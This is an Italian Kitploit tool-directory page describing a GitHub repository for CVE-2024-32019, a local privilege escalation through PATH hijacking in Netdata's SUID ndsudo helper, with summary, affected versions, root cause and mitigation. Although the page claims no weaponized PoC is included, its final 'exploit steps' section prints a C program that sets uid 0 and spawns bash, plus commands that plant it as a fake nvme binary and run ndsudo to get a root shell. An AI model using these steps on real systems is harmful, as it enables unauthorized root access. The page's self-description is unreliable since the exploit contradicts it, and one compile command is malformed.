Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2024-32019-PoC — Verifica l'esposizione all'escalation di privilegi SUID PATH di Netdata ndsudo per CVE-2024-32019 e convalida le patch senza sfruttamento weaponized. | Kitploit
Strumenti/GitHubGitHub/ayub0x7/cve-2024-32019-poc
Strumenti DifensiviEscalation di PrivilegiAnalisi delle VulnerabilitàExploitVirtualizzazione per la SicurezzaPenetration Testing
GitHubayub0x7/cve-2024-32019-poc

cve-2024-32019-PoC

Verifica l'esposizione all'escalation di privilegi SUID PATH di Netdata ndsudo per CVE-2024-32019 e convalida le patch senza sfruttamento weaponized.

Vedi Repository
201 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-32019 — Escalatione di privilegi locale in Netdata ndsudo

Riepilogo

L'helper ndsudo di Netdata (installato setuid root) limita i comandi che eseguirà, ma risolve quei comandi usando il PATH del chiamante. Nelle versioni interessate, un utente locale può collocare un binario malevolo all'inizio del PATH e far sì che ndsudo lo esegua con privilegi di root. Corretto in Netdata 1.45.3 e 1.45.0-169.

Interessate / Corrette

  • Interessate: >= 1.44.0-60, < 1.45.0-169 e >= 1.45.0, < 1.45.3 (secondo l'advisory upstream).

  • Corrette: 1.45.3 (stable), 1.45.0-169 (nightly). GitHub

Impatto

Escalatione di privilegi locale a root sui sistemi in cui ndsudo è installato SUID e l'utente può invocarlo (comunemente i membri del gruppo netdata). NVDGitHub

Causa principale (ad alto livello)

  • ndsudo è SUID-root e inserisce in whitelist sottocomandi come nvme-list, nvme-smart-log, ecc.

  • Chiama eseguibili esterni per nome (ad es. nvme), che vengono risolti tramite PATH invece di usare percorsi assoluti o una ricerca sicura e fissa.

  • Se una directory scrivibile appare prima dei percorsi di sistema, un attaccante può introdurre un binario simile che viene eseguito come root. GitHub

Riproduzione / Verifica sicura

Questo repository include checker non-exploit che:

  • Ispezionano /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (o ovunque sia installato) per SUID/proprietà.

  • Enumerano il PATH per directory scrivibili precedenti ai percorsi di sistema comuni.

  • Confermano la presenza di nomi di sottocomandi in whitelist che ndsudo potrebbe tentare di eseguire.

  • Opzionalmente eseguono ndsudo --test <subcommand> per stampare il comando risolto senza eseguirlo (usare con cautela, leggere prima il codice). GitHub

⚠️ Nessun PoC weaponizzato è incluso. Questo progetto è per difensori e ricercatori per valutare l'esposizione e convalidare le patch in modo responsabile.

Mitigazione

  • Aggiornare Netdata a 1.45.3 (stable) o 1.45.0-169 (nightly).

  • Come misura di difesa in profondità, preferire percorsi assoluti o un PATH minimale sanificato negli helper SUID; evitare di concedere accesso non necessario a ndsudo. GitHubwiz.io

Passaggi di exploit

1. Salvare il seguente codice C come nvme.c:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
2. Compilare l'exploit
gcc nvme.c - nvme
3. Configurazione dell'ambiente
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
4. Modificare il PATH
export PATH=/tmp/fakebin:$PATH
5. Comando di exploit
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

Riferimenti

  • NVD: CVE-2024-32019. NVD

  • Netdata Advisory (GHSA-pmhq-4cxq-wj93). GitHub

  • Riassunto Wiz. wiz.io

  • Approfondimento Snyk. Vulnerability Guide

  • Elenco MITRE/CVE. CVE

Scarica lo strumento